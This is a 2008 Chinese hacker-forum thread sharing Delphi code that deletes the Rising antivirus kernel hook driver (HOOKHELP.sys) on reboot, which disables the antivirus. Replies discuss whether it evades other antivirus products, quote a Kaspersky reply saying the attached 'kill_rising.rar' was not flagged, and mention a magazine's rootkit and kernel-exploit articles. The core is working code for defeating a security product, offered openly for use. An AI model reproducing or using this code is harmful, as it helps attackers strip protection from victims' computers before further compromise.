【简单突破瑞星】

ranguangning

关键代码：
function Deleterising:boolean;
var
Wdir : pChar;
Stmp,RisHookPath:string;
Hfile:THandle;
begin
result:=false;
Getmem(wdir,255);
GetSystemDirectory(Wdir, 255); //得到系统System32的目录
Stmp:=pchar(wdir);
if (Stmp[length(Stmp)]<>'\') then Stmp:=Stmp+'\';
RisHookPath:=Stmp+'drivers\HOOKHELP.sys';//得到瑞星的底层HOOK驱动文件的路径
//showmessage(RisHookPath);
Try
Hfile:=CreateFile(PCHAR(RisHookPath),GENERIC_READ,FILE_SHARE_READ,nil,OPEN_EXISTING,FILE_FLAG_DELETE_ON_CLOSE,0);//其中FILE_FLAG_DELETE_ON_CLOSE参数的含义是系统重启后删除文件
closehandle(hfile);
result:=true;
except
end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
if Deleterising then
begin
showmessage('删除文件成功，请重启系统！');
end;
end;
end.




[ 本帖最后由 ranguangning 于 2008-8-8 18:51 编辑 ]

qigang

哦，看看。

Palkia

金山~0

无尽藏海

瑞星拦得住不？

sbbdms

Kaspersky miss
TO KL

Hello.
No malicious software was found in the attached file.
-----------------
Regards, Andrey Ladikov
Virus Analyst, Kaspersky Lab.

Ph.: +7(495) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com   http://www.viruslist.com


> Attachment: kill_rising.rar

[ 本帖最后由 sbbdms 于 2008-8-8 18:48 编辑 ]

er18

干掉瑞星?   当然对其他的杀软无威胁了

lqjt110

原帖由 er18 于 2008-8-8 16:42 发表
干掉瑞星?   当然对其他的杀软无威胁了

你怎么知道对其他的杀软没有威胁,你也太自信了吧?

Palkia

看楼主给的关键代码~

至少我运行对我机上的杀软没影响~

Palkia

可以用来收藏~卸载不了瑞星时用~

ranguangning

【其实我是买的《黑客防线》的2008年第8期（总第92期），这一期有介绍底层，内核，ring0，rootkit，大家可以去买来一看，这个突破瑞星的方法很简单，只是抛砖引玉的作用】

【公布几个这一期的《黑客防线》文章标题：rootkit端口隐藏实现，内核模式结束冰刃进程，ring0中强行结束进程，远程利用windows内核漏洞】

【声明：不是打广告，买不买自愿，12.5元/本】

【今天晚上不上了，看奥运会去了，奥运会开幕式完了以后再说】